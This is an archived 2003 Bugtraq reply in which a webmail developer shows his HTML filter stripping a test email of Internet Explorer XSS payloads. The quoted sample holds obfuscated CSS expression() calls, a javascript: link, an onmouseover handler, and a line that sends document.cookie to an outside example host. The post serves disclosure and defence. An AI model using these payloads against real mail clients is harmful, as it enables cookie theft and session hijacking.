Bugtraq mailing list archives
Re: Webmails + Internet Explorer can create unwanted javascript execution
From: "Jason Munro" <jason () stdbev com>
Date: Fri, 3 Oct 2003 11:56:47 -0500
On October 2, 4:39 pm Jedi/Sector One <j () pureftpd org> wrote: FWIW, Hastymail, (a lesser known webmail IMAP client written in PHP i'm working on) does filter out this nastyness. HTML before:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr"> <head> <title>Webmail test</title> <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" /> </head> <body style="width:expres\sion(alert(1))"> <style type="text/css"> h1 { he\ight:e\xpression(alert(2)); bac\kground-image:e\xpression('url(http://example.org/'+document.c ookie+$ } </style> <h1 style="width:expression(alert(3))">...</h1> <div id="just-for-fun"> <a href="javascript:window.open(document.location);" onmouseover="alert(4)">fireworks</a> </div> </body> </html>
HTML after: <!-- begin sanitized html --> <h1 style="width:idiocy(alert(3))">...</h1> <div id="just-for-fun"> <a>fireworks</a> </div> <!-- end sanitized html --> The default filter settings do not allow HTML hyperlinks, but this can be adjusted by the user producing this output for the 'fireworks' link instead: <a href="blah:window.open(document.location);" target="_new">fireworks</a> Hastymail uses the PHP HTML filter written by Konstantin Riabitsev found here: http://www.mricon.com/html/phpfilter.html The filter paramaters are set very tightly to avoid this kind of issue. While squirrelmail's filter is based on the same engine apparently either it's not up to date or the params are not set as tight. \_____ Jason Munro ________________________ \_____ jason () stdbev com ___________________ \_____ #hastymail at irc.freenode.net _____ \_____ http://hastymail.sourceforge.net ___
Current thread:
- Webmails + Internet Explorer can create unwanted javascript execution Jedi/Sector One (Oct 03)
- RE: Webmails + Internet Explorer can create unwanted javascript execution Drew Copley (Oct 03)
- Divine OpenMarket Content Server XSS Valgasu (Oct 03)
- <Possible follow-ups>
- Re: Webmails + Internet Explorer can create unwanted javascript execution Jason Munro (Oct 03)
- Re: Webmails + Internet Explorer can create unwanted javascript execution Jedi/Sector One (Oct 03)